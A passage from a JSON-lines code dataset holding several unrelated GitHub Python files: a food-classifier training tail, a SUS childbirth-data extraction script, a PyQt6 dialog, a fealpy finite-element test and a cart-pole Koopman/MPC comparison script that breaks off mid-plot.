batch_size)\r\n\r\nclassify.save('model.h5')\r\nclassify.save_weights('model_weighte.h5')\r\n\r\n\r\n","repo_name":"anasAloklah/food-classification-v0","sub_path":"train_test.py","file_name":"train_test.py","file_ext":"py","file_size_in_byte":2553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"75045527788","text":"'''\n Produção de partos.\n\n Alguns campos:\n N_AIH: numero da aih, é o ID do banco\n GESTAO: 1 municipal, 2 estadual\n MUNIC_RES: munic. residencia\n MUNIC_MOV: munic. internacao\n PROC_REA: procedimento realizado\n ANO_CMPT\n MES_CMPT\n NASC\n SEXO\n DT_INTER\n DT_SAIDA\n IDADE\n MORTE\n CNES\n RACA_COR\n MARCA_UTI: tipo de UTI\n MARCA_UCI: tipo de UCI\n'''\n\nimport os\nimport pathlib\nimport pandas as pd\nfrom pysus.online_data.SIH import download\nfrom pyarrow.lib import ArrowInvalid\n\nSTATES = 'pe'\nYEAR = 2021\nMONTHS = list(range(1, 13))\nDATA_DIR = pathlib.Path(os.getcwd(), 'datasets', '.pysus')\nPROCED_ID = {\n '0310010039': ['Nornal', 'PARTO NORMAL'],\n '0310010055': ['Normal', 'PARTO NORMAL EM CENTRO DE PARTO NORMAL (CPN)'],\n '0411010034': ['Cesário', 'PARTO CESARIANO'],\n '0411010042': ['Cesário', 'PARTO CESARIANO C/ LAQUEADURA TUBARIA'],\n '0310010047': ['De Risco', 'PARTO NORMAL EM GESTACAO DE ALTO RISCO'],\n '0411010026': ['De Risco', 'PARTO CESARIANO EM GESTACAO ALTO RISCO']\n}\n\nos.environ['PYSUS_CACHEPATH'] = str(DATA_DIR)\n\ndef extract_files(states, year, months, data_dir):\n files = [download(states, year, m, data_dir) for m in months]\n return files\n\ndef _queries_concat(queries):\n q = [\n f\"{k} == {v if type(v) == list else [str(v)]}\" \n for k, v in queries.items() \n ]\n \n query = ' & '.join(q)\n return query\n\ndef create_dataframe(data_dir, **kwargs):\n\n files = os.listdir(data_dir)\n try:\n df = pd.concat(\n [pd.read_parquet(f'{DATA_DIR}/{file}') for file in files]\n )\n except ArrowInvalid:\n err = 'Não foi possível gerar o dataframe '\\\n 'Os arquivos foram baixados?'\n return print(err)\n\n query = _queries_concat(kwargs)\n\n if query:\n return df.query(query)\n return df\n\n\nif __name__ == '__main__':\n cols_sel = [\n 'GESTAO', \n 'MUNIC_RES', \n 'MUNIC_MOV', \n 'PROC_REA', \n 'ANO_CMPT', \n 'MES_CMPT', \n 'NASC',\n 'SEXO', \n 'DT_INTER', \n 'DT_SAIDA', \n 'IDADE', \n 'MORTE', \n 'CNES', \n 'RACA_COR', \n 'MARCA_UTI',\n 'MARCA_UCI'\n ]\n\n int_cols = [\n 'MUNIC_RES', \n 'MUNIC_MOV',\n 'ANO_CMPT', \n 'MES_CMPT', \n 'IDADE', \n 'RACA_COR', \n 'SEXO', \n 'GESTAO'\n ]\n\n proced = list(PROCED_ID.keys())\n df = create_dataframe(DATA_DIR, PROC_REA=proced)\n df.set_index('N_AIH', inplace=True)\n df_partos = df[cols_sel]\n df_partos[int_cols] = df_partos[int_cols].astype('int32')\n \n df_geres = pd.read_parquet('datasets/localidade_pe.parquet.gzip')\n","repo_name":"bernarducs/sus_extracoes","sub_path":"partos/producao.py","file_name":"producao.py","file_ext":"py","file_size_in_byte":2780,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37420432111","text":"from PyQt6.QtWidgets import QDialog, QHBoxLayout, QVBoxLayout, QPushButton, QTreeWidget, QTreeWidgetItem\n\nclass SelectFromEntityChild(QDialog):\n def __init__(self, entity):\n super().__init__()\n\n self._entity = entity\n self._selectedEntity = None\n\n self._rootLayout = QVBoxLayout()\n self._tree = QTreeWidget()\n self._tree.setHeaderHidden(True)\n self._tree.setColumnCount(1)\n self._tree.setSortingEnabled(False)\n self._tree.currentItemChanged.connect(self._signal_tree_currentItemChanged)\n self._buildTree(self._entity, self._tree.invisibleRootItem())\n self._rootLayout.addWidget(self._tree)\n\n self._buttotLayout = QHBoxLayout()\n\n self._cancelBt = QPushButton(\"Cancel\")\n self._cancelBt.clicked.connect(self._signal_cancelBt_clicked)\n self._buttotLayout.addWidget(self._cancelBt)\n\n self._selectBt = QPushButton(\"Select\")\n self._selectBt.clicked.connect(self._signal_selectBt_clicked)\n self._selectBt.setEnabled(False)\n self._buttotLayout.addWidget(self._selectBt)\n\n self._rootLayout.addLayout(self._buttotLayout)\n\n self.setLayout(self._rootLayout)\n self.setWindowTitle(\"Select Entity\")\n\n def _signal_cancelBt_clicked(self):\n self._selectedEntity = None\n self.done(0)\n\n def _signal_selectBt_clicked(self):\n self.done(0)\n\n def _buildTree(self, rootEntity, rootItem):\n item = QTreeWidgetItem(rootItem)\n if rootEntity == self._entity:\n item.setText(0, \"{0} (this)\".format(rootEntity.getName()))\n else:\n if rootEntity.isInternal():\n item.setText(0, rootEntity.getName())\n else:\n item.setText(0, \"{0} {1}\".format(rootEntity.getName(), rootEntity.getNameSuffix()))\n item._entity = rootEntity\n for childEnt in rootEntity.getChildren():\n self._buildTree(childEnt, item)\n\n def _signal_tree_currentItemChanged(self, currItem, prevItem):\n if currItem is not None:\n self._selectedEntity = currItem._entity\n self._selectBt.setEnabled(True)\n else:\n self._selectedEntity = None\n self._selectBt.setEnabled(False)\n\n def getSelectedEntity(self):\n return self._selectedEntity\n\n def reject(self):\n self._selectedEntity = None\n super().reject()","repo_name":"lastcolour/GamePractice","sub_path":"Sources/Editor/App/dialog/SelectFromEntityChild.py","file_name":"SelectFromEntityChild.py","file_ext":"py","file_size_in_byte":2404,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"40709519314","text":"#!/usr/bin/env python3\n# \nimport numpy as np\n\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.pyplot as plt\n\nfrom fealpy.functionspace import SurfaceLagrangeFiniteElementSpace\nfrom fealpy.pde.surface_poisson_model_3d import HeartSurfacetData\n\n\nclass SurfaceLagrangeFiniteElementSpaceTest:\n def __init__(self):\n pass\n\n def mesh_scale_test(self, plot=True):\n scale = 10\n pde = HeartSurfacetData()\n surface = pde.domain()\n mesh = pde.init_mesh()\n space = SurfaceLagrangeFiniteElementSpace(mesh, surface, p=1, scale=scale)\n mesh = space.mesh\n if plot is True:\n fig = plt.figure()\n axes = Axes3D(fig)\n mesh.add_plot(axes, showaxis=True)\n plt.show()\n\n def grad_recovery_test(self, p=1, plot=False):\n from fealpy.pde.surface_poisson_model_3d import SphereSinSinSinData \n pde = SphereSinSinSinData()\n surface = pde.domain()\n mesh = pde.init_mesh()\n for i in range(4):\n space = SurfaceLagrangeFiniteElementSpace(mesh, surface, p=p)\n uI = space.interpolation(pde.solution)\n rg = space.grad_recovery(uI)\n error0 = space.integralalg.L2_error(pde.solution, uI.value)\n error1 = space.integralalg.L2_error(pde.gradient, rg.value)\n\n def f(x):\n return np.sum(rg.value(x)**2, axis=-1)\n eta = space.integralalg.integral(f, celltype=True)\n\n mesh.uniform_refine(surface=surface)\n print(error1)\n\n\n\n\ntest = SurfaceLagrangeFiniteElementSpaceTest()\n#test.mesh_scale_test()\ntest.grad_recovery_test()\n\n","repo_name":"weihuayi/fealpy","sub_path":"example/oldexample/test/SurfaceLagrangeFiniteElementSpaceTest.py","file_name":"SurfaceLagrangeFiniteElementSpaceTest.py","file_ext":"py","file_size_in_byte":1643,"program_lang":"python","lang":"en","doc_type":"code","stars":209,"dataset":"github-code","pt":"37"} +{"seq_id":"11528162663","text":"#%%\n\"\"\"Cart Pendulum Example\"\"\"\nimport matplotlib\nfrom matplotlib.pyplot import ylim, xlabel, ylabel, fill_between\nimport os\nfrom matplotlib.pyplot import figure, grid, legend, plot, show, subplot, title, savefig, tight_layout\nfrom matplotlib.ticker import MaxNLocator\nfrom numpy import arange, array, concatenate\nfrom numpy import zeros, pi, random, interp, dot, multiply, asarray\nimport numpy as np\nfrom scipy.io import savemat\nfrom ..systems import CartPole\nfrom ..dynamics import LinearSystemDynamics\nfrom ..controllers import PDController, OpenLoopController, MPCController, MPCControllerDense\nfrom ..learning import KoopmanEigenfunctions, RBF, Edmd, Keedmd\nimport time\nimport dill\nimport control\nfrom datetime import datetime\nimport random as rand\nimport scipy.sparse as sparse\n\nclass CartPoleTrajectory(CartPole):\n def __init__(self, robotic_dynamics, q_d, t_d):\n m_c, m_p, l, g = robotic_dynamics.params\n CartPole.__init__(self, m_c, m_p, l, g)\n self.robotic_dynamics = robotic_dynamics\n self.q_d = q_d\n self.t_d = t_d\n\n def eval(self, q, t):\n return q - self.desired_state(t)\n\n def desired_state(self, t):\n return [interp(t, self.t_d.flatten(),self.q_d[ii,:].flatten()) for ii in range(self.q_d.shape[0])]\n\n def drift(self, q, t):\n return self.robotic_dynamics.drift(q, t)\n\n def act(self, q, t):\n return self.robotic_dynamics.act(q, t)\n\n#%% \n#! =============================================== SET PARAMETERS ===============================================\n\n# Define true system\nsystem_true = CartPole(m_c=.5, m_p=.2, l=.4)\nn, m = 4, 1 # Number of states and actuators\nupper_bounds = array([3.0, pi/3, 2, 2]) # Upper State constraints\nlower_bounds = -upper_bounds # Lower State constraints\n\n# Define nominal model and nominal controller:\nA_nom = array([[0., 0., 1., 0.], [0., 0., 0., 1.], [0., -3.924, 0., 0.], [0., 34.335, 0., 0.]]) # Linearization of the true system around the origin\nB_nom = array([[0.],[0.],[2.],[-5.]]) # Linearization of the true system around the origin\nK_p = -array([[7.3394, 39.0028]]) # Proportional control gains\nK_d = -array([[8.0734, 7.4294]]) # Derivative control gains\nnominal_sys = LinearSystemDynamics(A=A_nom, B=B_nom)\n\n# Simulation parameters (data collection)\nNtraj = 40 # Number of trajectories to collect data from\ndt = 1.0e-2 # Time step length\nN = int(2./dt) # Number of time steps\nt_eval = dt * arange(N + 1) # Simulation time points\nnoise_var = 0.5 # Exploration noise to perturb controller\ntraj_bounds = [2.5,0.25,0.05,0.05] # State constraints, [x, theta, x_dot, theta_dot]\nq_d = zeros((Ntraj,N+1,n)) # Desired trajectories (initialization)\nQ = sparse.diags([0,0,0,0]) # MPC state penalty matrix\nQN = sparse.diags([100000.,100000.,10000.,10000.]) # MPC final state penalty matrix\nR = sparse.eye(m) # MPC control penalty matrix\numax = 5 # MPC actuation constraint\nMPC_horizon = 2 # MPC time horizon [sec]\n\n# Koopman eigenfunction parameters\neigenfunction_max_power = 2 # Max power of variables in eigenfunction products\nl2_diffeomorphism = 0.0 # l2 regularization strength\njacobian_penalty_diffeomorphism = 1e1 # Estimator jacobian regularization strength\ndiff_n_epochs = 500 # Number of epochs\ndiff_train_frac = 0.9 # Fraction of data to be used for training\ndiff_n_hidden_layers = 3 # Number of hidden layers\ndiff_layer_width = 50 # Number of units in each layer\ndiff_batch_size = 16 # Batch size\ndiff_learn_rate = 1e-1 # Learning rate\ndiff_learn_rate_decay = 0.99 # Learning rate decay\ndiff_dropout_prob = 0.25 # Dropout rate\n\n# KEEDMD parameters\nl1_pos_keedmd = 0.001979592839755224 # l1 regularization strength for position states\nl1_pos_ratio_keedmd = 0.1 # l1-l2 ratio for position states\nl1_vel_keedmd = 0.024029630466870816 # l1 regularization strength for velocity states\nl1_vel_ratio_keedmd = 1.0 # l1-l2 ratio for velocity states\nl1_eig_keedmd = 6.819171287059534 # l1 regularization strength for eigenfunction states\nl1_eig_ratio_keedmd = 0.1 # l1-l2 ratio for eigenfunction states\n\n# EDMD parameters (benchmark to compare against)\nn_lift_edmd = (eigenfunction_max_power+1)**n-1 # Lifting dimension EDMD (same number as for KEEDMD)\nl1_edmd = 0.00687693796 # l1 regularization strength\nl1_ratio_edmd = 1.00 # l1-l2 ratio\nl1_ratio_vals = array([0.1, 0.5, 0.75, 0.9, 0.95, 0.99, 1.0])\n\n# Open loop evaluation parameters\nNtraj_pred = 40 # Number of trajectories to use to evaluate open loop performance\nnoise_var_pred = 0.5 # Exploration noise to perturb controller\ntraj_bounds_pred = [2, 0.5, 0.1, 0.1] # State constraints, [x, theta, x_dot, theta_dot]\nq_d_pred = zeros((Ntraj_pred, N + 1, n)) # Desired trajectories (initialization)\n\n# Closed loop evaluation parameters\nx_0_mpc = array([2., 0.25, 0., 0.]) # Initial condition\nt_pred_mpc = t_eval.squeeze() # Time steps\nnoise_var_mpc = 0.0 # Exploration noise to perturb controller\nQ_mpc = sparse.diags([5e3, 3e3, 1e2, 1e2]) # MPC state penalty matrix\nQN_mpc = Q # MPC final state penalty matrix\nR_mpc = sparse.eye(m) # MPC control penalty matrix\nD_mpc = sparse.diags([500,300,50,60]) # MPC state constraint violation penalty matrix\nupper_bounds_mpc = array([np.Inf, np.Inf, np.Inf, np.Inf]) # MPC state constraints\nlower_bounds_mpc = -upper_bounds_mpc # MPC state constraints\numax_mpc = 5. # MPC actuation constraint\nhorizon_mpc = 0.4 # MPC time horizon\n\n\n\n#%% \n#! =============================================== COLLECT DATA ===============================================\nprint(\"Collect data:\")\nprint(\" - Generate optimal desired path...\",end=\" \")\nt0 = time.process_time()\n\nmpc_controller = MPCController(linear_dynamics=nominal_sys,\n N=int(MPC_horizon/dt),\n dt=dt,\n umin=array([-umax]),\n umax=array([+umax]),\n xmin=lower_bounds,\n xmax=upper_bounds,\n Q=Q,\n R=R,\n QN=QN,\n xr=zeros(n))\nfor ii in range(Ntraj):\n x_0 = asarray([rand.uniform(-i,i) for i in traj_bounds])\n while abs(x_0[0]) < 1.25:\n x_0 = asarray([rand.uniform(-i, i) for i in traj_bounds])\n mpc_controller.eval(x_0,0)\n q_d[ii,:,:] = mpc_controller.parse_result().transpose()\n\nsavemat('./core/examples/cart_pole_d.mat', {'t_d': t_eval, 'q_d': q_d})\nprint('in {:.2f}s'.format(time.process_time()-t0))\n\n# Simulate system from each initial condition\nprint(' - Simulate system with {} trajectories using PD controller...'.format(Ntraj), end =\" \")\nt0 = time.process_time()\noutputs = [CartPoleTrajectory(system_true, q_d[i,:,:].transpose(), t_eval) for i in range(Ntraj)]\npd_controllers = [PDController(outputs[i], K_p, K_d, noise_var) for i in range(Ntraj)]\npd_controllers_nom = [PDController(outputs[i], K_p, K_d, 0.) for i in range(Ntraj)] # Duplicate of controllers with no noise perturbation\nxs, us, us_nom, ts = [], [], [], []\nfor ii in range(Ntraj):\n x_0 = q_d[ii,0,:]\n xs_tmp, us_tmp = system_true.simulate(x_0, pd_controllers[ii], t_eval)\n us_nom_tmp = pd_controllers_nom[ii].eval(xs_tmp.transpose(), t_eval).transpose()\n xs.append(xs_tmp)\n us.append(us_tmp)\n us_nom.append(us_nom_tmp[:us_tmp.shape[0],:])\n ts.append(t_eval)\n\nxs, us, us_nom, ts = array(xs), array(us), array(us_nom), array(ts)\nprint('in {:.2f}s'.format(time.process_time()-t0))\n\n#%%\n#! =============================================== FIT MODELS ===============================================\n\n# Construct basis of Koopman eigenfunctions for KEEDMD:\nprint('Construct Koopman eigenfunction basis:\\n', end =\"\")\nt0 = time.process_time()\nA_cl = A_nom - dot(B_nom,concatenate((K_p, K_d),axis=1))\nBK = dot(B_nom,concatenate((K_p, K_d),axis=1))\neigenfunction_basis = KoopmanEigenfunctions(n=n, max_power=eigenfunction_max_power, A_cl=A_cl, BK=BK)\neigenfunction_basis.build_diffeomorphism_model(jacobian_penalty=jacobian_penalty_diffeomorphism, n_hidden_layers = diff_n_hidden_layers, layer_width=diff_layer_width, batch_size= diff_batch_size, dropout_prob=diff_dropout_prob)\neigenfunction_basis.fit_diffeomorphism_model(X=xs, t=ts, X_d=q_d, l2=l2_diffeomorphism, learning_rate=diff_learn_rate,\n learning_decay=diff_learn_rate_decay, n_epochs=diff_n_epochs, train_frac=diff_train_frac, batch_size=diff_batch_size)\neigenfunction_basis.construct_basis(ub=upper_bounds, lb=lower_bounds)\n\nprint('in {:.2f}s'.format(time.process_time()-t0))\n\n# Fit KEEDMD model:\nprint(' - Fitting KEEDMD model...', end =\" \")\nt0 = time.process_time()\nkeedmd_model = Keedmd(eigenfunction_basis, n, l1_pos=l1_pos_keedmd, l1_ratio_pos=l1_pos_ratio_keedmd, l1_vel=l1_vel_keedmd, l1_ratio_vel=l1_vel_ratio_keedmd, l1_eig=l1_eig_keedmd, l1_ratio_eig=l1_eig_ratio_keedmd, K_p=K_p, K_d=K_d)\nX, X_d, Z, Z_dot, U, U_nom, t = keedmd_model.process(xs, q_d, us, us_nom, ts)\n#keedmd_model.fit(X, X_d, Z, Z_dot, U, U_nom)\nkeedmd_model.tune_fit(X, X_d, Z, Z_dot, U, U_nom, l1_ratio=l1_ratio_vals)\n\nprint('in {:.2f}s'.format(time.process_time()-t0))\n\n# Construct basis of RBFs for EDMD:\nprint(' - Constructing RBF basis...', end =\" \")\nt0 = time.process_time()\n\nrbf_centers = multiply(random.rand(n,n_lift_edmd),(upper_bounds-lower_bounds).reshape((upper_bounds.shape[0],1)))+lower_bounds.reshape((upper_bounds.shape[0],1))\nrbf_basis = RBF(rbf_centers, n, gamma=1.)\nrbf_basis.construct_basis()\n\nprint('in {:.2f}s'.format(time.process_time()-t0))\n\n# Fit EDMD model\nprint(' - Fitting EDMD model...', end =\" \")\nt0 = time.process_time()\nedmd_model = Edmd(rbf_basis, n, l1=l1_edmd, l1_ratio=l1_ratio_edmd)\nX, X_d, Z, Z_dot, U, U_nom, t = edmd_model.process(xs, q_d, us, us_nom, ts)\nedmd_model.fit(X, X_d, Z, Z_dot, U, U_nom)\n#edmd_model.tune_fit(X, X_d, Z, Z_dot, U, U_nom, l1_ratio=l1_ratio_vals)\n\nprint('in {:.2f}s'.format(time.process_time()-t0))\n\n#%%\n#! ============================================== EVALUATE PERFORMANCE -- OPEN LOOP =========================================\n\n# Set up trajectory and controller for prediction task:\nprint('Evaluate Performance with open loop prediction...', end =\" \")\nt0 = time.process_time()\nt_pred = t_eval.squeeze()\n\nfor ii in range(Ntraj_pred):\n x_0 = asarray([random.uniform(-i, i) for i in traj_bounds_pred])\n mpc_controller.eval(x_0, 0)\n q_d_pred[ii,:, :] = mpc_controller.parse_result().transpose()\n\nsavemat('./core/examples/cart_pole_pred_d.mat', {'t_d': t_eval, 'q_d_pred': q_d_pred})\n\n# Define KEEDMD and EDMD systems:\nkeedmd_sys = LinearSystemDynamics(A=keedmd_model.A, B=keedmd_model.B)\nedmd_sys = LinearSystemDynamics(A=edmd_model.A, B=edmd_model.B)\n\n#Simulate all different systems\nxs_pred = []\nxs_keedmd = []\nxs_edmd = []\nxs_nom = []\n\nfor ii in range(Ntraj_pred):\n output_pred = CartPoleTrajectory(system_true, q_d_pred[ii,:,:].transpose(),t_pred)\n pd_controller_pred = PDController(output_pred, K_p, K_d, noise_var_pred)\n\n # Simulate true system (baseline):\n x0_pred = q_d_pred[ii,0,:]\n xs_pred_tmp, us_pred_tmp = system_true.simulate(x0_pred, pd_controller_pred, t_pred)\n xs_pred_tmp = xs_pred_tmp.transpose()\n\n # Create systems for each of the learned models and simulate with open loop control signal us_pred:\n keedmd_controller = OpenLoopController(keedmd_sys, us_pred_tmp, t_pred[:us_pred_tmp.shape[0]])\n z0_keedmd = keedmd_model.lift(x0_pred.reshape(x0_pred.shape[0],1), q_d_pred[ii,:1,:].transpose()).squeeze()\n zs_keedmd,_ = keedmd_sys.simulate(z0_keedmd,keedmd_controller,t_pred)\n xs_keedmd_tmp = dot(keedmd_model.C,zs_keedmd.transpose())\n\n edmd_controller = OpenLoopController(edmd_sys, us_pred_tmp, t_pred[:us_pred_tmp.shape[0]])\n z0_edmd = edmd_model.lift(x0_pred.reshape(x0_pred.shape[0],1), q_d_pred[ii,:1,:].transpose()).squeeze()\n zs_edmd,_ = edmd_sys.simulate(z0_edmd,edmd_controller,t_pred)\n xs_edmd_tmp = dot(edmd_model.C,zs_edmd.transpose())\n\n nom_controller = OpenLoopController(nominal_sys, us_pred_tmp, t_pred[:us_pred_tmp.shape[0]])\n xs_nom_tmp,_ = nominal_sys.simulate(x0_pred,nom_controller,t_pred)\n xs_nom_tmp = xs_nom_tmp.transpose()\n\n xs_pred.append(xs_pred_tmp)\n xs_keedmd.append(xs_keedmd_tmp)\n xs_edmd.append(xs_edmd_tmp)\n xs_nom.append(xs_nom_tmp)\n\n# Calculate error statistics\nmse_keedmd = array([(xs_keedmd[ii] - xs_pred[ii])**2 for ii in range(Ntraj_pred)])\nmse_edmd = array([(xs_edmd[ii] - xs_pred[ii])**2 for ii in range(Ntraj_pred)])\nmse_nom = array([(xs_nom[ii] - xs_pred[ii])**2 for ii in range(Ntraj_pred)])\ne_keedmd = array(np.abs([xs_keedmd[ii] - xs_pred[ii] for ii in range(Ntraj_pred)]))\ne_edmd = array(np.abs([xs_edmd[ii] - xs_pred[ii] for ii in range(Ntraj_pred)]))\ne_nom = array(np.abs([xs_nom[ii] - xs_pred[ii] for ii in range(Ntraj_pred)]))\nmse_keedmd = np.mean(np.mean(np.mean(mse_keedmd)))\nmse_edmd = np.mean(np.mean(np.mean(mse_edmd)))\nmse_nom = np.mean(np.mean(np.mean(mse_nom)))\ne_mean_keedmd = np.mean(e_keedmd, axis=0)\ne_mean_edmd = np.mean(e_edmd, axis=0)\ne_mean_nom = np.mean(e_nom, axis=0)\ne_std_keedmd = np.std(e_keedmd, axis=0)\ne_std_edmd = np.std(e_edmd, axis=0)\ne_std_nom = np.std(e_nom, axis=0)\n\n# Save open loop data for analysis and plotting:\nfolder = \"core/examples/results/\" + datetime.now().strftime(\"%m%d%Y_%H%M%S\")\nos.mkdir(folder)\ndata_list = [t_pred, mse_keedmd, mse_edmd, mse_nom, e_keedmd, e_edmd, e_nom, e_mean_keedmd, e_mean_edmd, e_mean_nom, e_std_keedmd, e_std_edmd, e_std_nom, xs_keedmd, xs_edmd, xs_nom, xs_pred]\noutfile = open(folder + \"/open_loop.pickle\", 'wb')\ndill.dump(data_list, outfile)\noutfile.close()\n\nprint('in {:.2f}s'.format(time.process_time()-t0))\n\nCmatrix_edmd = control.ctrb(A=edmd_model.A, B=edmd_model.B)\nprint('EDMD controllability matrix rank is {}, ns={}, nz={}'.format(np.linalg.matrix_rank(Cmatrix_edmd),n,edmd_model.A.shape[0]))\nCmatrix_keedmd = control.ctrb(A=keedmd_model.A, B=keedmd_model.B)\nprint('KEEDMD controllability matrix rank is {}, ns={}, nz={}'.format(np.linalg.matrix_rank(Cmatrix_keedmd),n,edmd_model.A.shape[0]))\n\n\n#%% \n#!============================================== EVALUATE PERFORMANCE -- CLOSED LOOP =============================================\nt0 = time.process_time()\nprint('Evaluate Performance with closed loop trajectory tracking...', end=\" \")\n\n# Generate trajectory:\nmpc_controller.eval(x_0_mpc, 0)\nqd_mpc = mpc_controller.parse_result()\n\n# Nominal model MPC:\nprint('\\n - Nominal model')\nnominal_mpc_controller = MPCControllerDense(linear_dynamics=nominal_sys,\n N=int(horizon_mpc/dt),\n dt=dt,\n umin=array([-umax_mpc]),\n umax=array([+umax_mpc]),\n xmin=lower_bounds_mpc,\n xmax=upper_bounds_mpc,\n Q=Q_mpc,\n R=R_mpc,\n QN=QN_mpc,\n xr=qd_mpc,\n plotMPC=False,\n name='Nom')\n\nxs_nom_mpc, us_nom_mpc = system_true.simulate(x_0_mpc, nominal_mpc_controller, t_pred_mpc)\nxs_nom_mpc = xs_nom_mpc.transpose()\nus_nom_mpc = us_nom_mpc.transpose()\n\n# EDMD MPC:\nprint(' - EDMD model')\nedmd_sys = LinearSystemDynamics(A=edmd_model.A, B=edmd_model.B)\nedmd_controller = MPCControllerDense(linear_dynamics=edmd_sys,\n N=int(horizon_mpc/dt),\n dt=dt,\n umin=array([-umax_mpc]),\n umax=array([+umax_mpc]),\n xmin=lower_bounds_mpc,\n xmax=upper_bounds_mpc,\n Q=Q_mpc,\n R=R_mpc,\n QN=QN_mpc,\n xr=qd_mpc,\n lifting=True,\n edmd_object=edmd_model,\n plotMPC=False,\n soft=True,\n D=D_mpc,\n name='EDMD')\n\nxs_edmd_mpc, us_emdm_mpc = system_true.simulate(x_0_mpc, edmd_controller, t_pred_mpc)\nxs_edmd_mpc = xs_edmd_mpc.transpose()\nus_edmd_mpc = us_emdm_mpc.transpose()\n\n#KEEDMD MPC:\nprint(' - KEEDMD model')\nkeedmd_sys = LinearSystemDynamics(A=keedmd_model.A, B=keedmd_model.B)\nkeedmd_controller = MPCControllerDense(linear_dynamics=keedmd_sys,\n N=int(horizon_mpc/dt),\n dt=dt,\n umin=array([-umax_mpc]),\n umax=array([+umax_mpc]),\n xmin=lower_bounds_mpc,\n xmax=upper_bounds_mpc,\n Q=Q_mpc,\n R=R_mpc,\n QN=QN_mpc,\n xr=qd_mpc,\n lifting=True,\n edmd_object=keedmd_model,\n plotMPC=False,\n soft=True,\n D=D_mpc,\n name='KEEDMD')\n\nxs_keedmd_mpc, us_keemdm_mpc = system_true.simulate(x_0_mpc, keedmd_controller, t_pred_mpc)\nxs_keedmd_mpc = xs_keedmd_mpc.transpose()\nus_keedmd_mpc = us_keemdm_mpc.transpose()\n\nprint('in {:.2f}s'.format(time.process_time()-t0))\nt0 = time.process_time()\n\n# Calculate statistics for the different models\nmse_mpc_nom = sum(sum((xs_nom_mpc-qd_mpc)**2))/xs_nom_mpc.size\nmse_mpc_edmd = sum(sum((xs_edmd_mpc-qd_mpc)**2))/xs_edmd_mpc.size\nmse_mpc_keedmd = sum(sum((xs_keedmd_mpc-qd_mpc)**2))/xs_keedmd_mpc.size\nE_nom = np.linalg.norm(us_nom_mpc)\nE_edmd = np.linalg.norm(us_edmd_mpc)\nE_keedmd = np.linalg.norm(us_keedmd_mpc)\n\nQ_d = Q_mpc.todense()\nR_d = R_mpc.todense()\ncost_nom = sum(np.diag(np.dot(np.dot((xs_nom_mpc-qd_mpc).T,Q_d), xs_nom_mpc-qd_mpc))) + sum(np.diag(np.dot(np.dot(us_nom_mpc.T,R_d),us_nom_mpc)))\ncost_edmd = sum(np.diag(np.dot(np.dot((xs_edmd_mpc-qd_mpc).T,Q_d), xs_edmd_mpc-qd_mpc))) + sum(np.diag(np.dot(np.dot(us_edmd_mpc.T,R_d),us_edmd_mpc)))\ncost_keedmd = sum(np.diag(np.dot(np.dot((xs_keedmd_mpc-qd_mpc).T,Q_d), xs_keedmd_mpc-qd_mpc))) + sum(np.diag(np.dot(np.dot(us_keedmd_mpc.T,R_d),us_keedmd_mpc)))\nprint('Tracking error (MSE), Nominal: ', mse_mpc_nom, ', EDMD: ', mse_mpc_edmd, 'KEEDMD: ', mse_mpc_keedmd)\nprint('Control effort (norm), Nominal: ', E_nom, ', EDMD: ', E_edmd, ', KEEDMD: ', E_keedmd)\nprint('MPC cost, Nominal: ', cost_nom, ', EDMD: ', cost_edmd, ', KEEDMD: ', cost_keedmd)\nprint('MPC cost improvement, EDMD: ', (cost_edmd/cost_nom-1)*100, '%, KEEDMD: ', (cost_keedmd/cost_nom-1)*100, '%')\n\n# Save closed loop data for analysis and plotting:\ndata_list = [t_pred_mpc, qd_mpc, xs_nom_mpc, xs_edmd_mpc, xs_keedmd_mpc, us_nom_mpc, us_edmd_mpc, us_keedmd_mpc, mse_mpc_nom, mse_mpc_edmd, mse_mpc_keedmd, E_nom, E_edmd, E_keedmd, cost_nom, cost_edmd, cost_keedmd]\noutfile = open(folder + \"/closed_loop.pickle\", 'wb')\ndill.dump(data_list, outfile)\noutfile.close()\n\n#%%\n#!======================================== PLOT OPEN AND CLOSED LOOP RESULTS FOR PAPER =========================================\n\n# Plot errors of different models and statistics, open loop\nylabels = ['$e_x$', '$e_{\\\\theta}$']\nax = figure(figsize=(6,5)).gca()\nfor ii in range(2):\n subplot(2, 1, ii+1)\n plot(t_pred, e_mean_nom[ii,:], linewidth=2, label='Nominal', color='tab:gray')\n fill_between(t_pred, e_mean_nom[ii,:]-e_std_nom[ii,:], e_mean_nom[ii,:]+e_std_nom[ii,:], alpha=0.2, color='tab:gray')\n\n plot(t_pred, e_mean_edmd[ii,:], linewidth=2, label='EDMD', color='tab:green')\n fill_between(t_pred, e_mean_edmd[ii,:] - e_std_edmd[ii, :], e_mean_edmd[ii,:] + e_std_edmd[ii, :], alpha=0.2, color='tab:green')\n\n plot(t_pred, e_mean_keedmd[ii,:], linewidth=2, label='KEEDMD',color='tab:orange')\n fill_between(t_pred, e_mean_keedmd[ii,:]- e_std_keedmd[ii, :], e_mean_keedmd[ii,:] + e_std_keedmd[ii, :], alpha=0.2,color='tab:orange')\n\n ylabel(ylabels[ii])\n grid()\n if ii == 0:\n title('Mean open loop prediction error (+/- 1 std)')\n legend(fontsize=10, loc='upper left')\n ylim(-2., 2.)\n else:\n ylim(-4., 4.)\n\nxlabel('Time (sec)')\nax.yaxis.set_major_locator(MaxNLocator(integer=True))\nmatplotlib.rcParams['pdf.fonttype'] = 42\nmatplotlib.rcParams['ps.fonttype'] = 42\ntight_layout()\nsavefig('core/examples/results/openloop_error.pdf', format='pdf', dpi=2400)\n\n# Plot the closed loop trajectory:\nylabels = ['$x$', '$\\\\theta$']\nbx = figure(figsize=(6,5)).gca()\nfor ii in range(2):\n subplot(2, 1, ii+1)\n plot(t_pred, qd_mpc[ii,:], linestyle=\"--\",linewidth=2, label='Reference')\n plot(t_pred, xs_nom_mpc[ii, :], linewidth=2, label='Nominal', color='tab:gray')\n plot(t_pred, xs_edmd_mpc[ii,:], linewidth=2, label='EDMD', color='tab:green')\n plot(t_pred, xs_keedmd_mpc[ii,:], linewidth=2, label='KEEDMD',color='tab:orange')\n ylabel(ylabels[ii])\n grid()\n if ii == 0:\n title('Closed loop trajectory tracking with MPC')\n legend(fontsize=10, loc='lower left')\nxlabel('Time 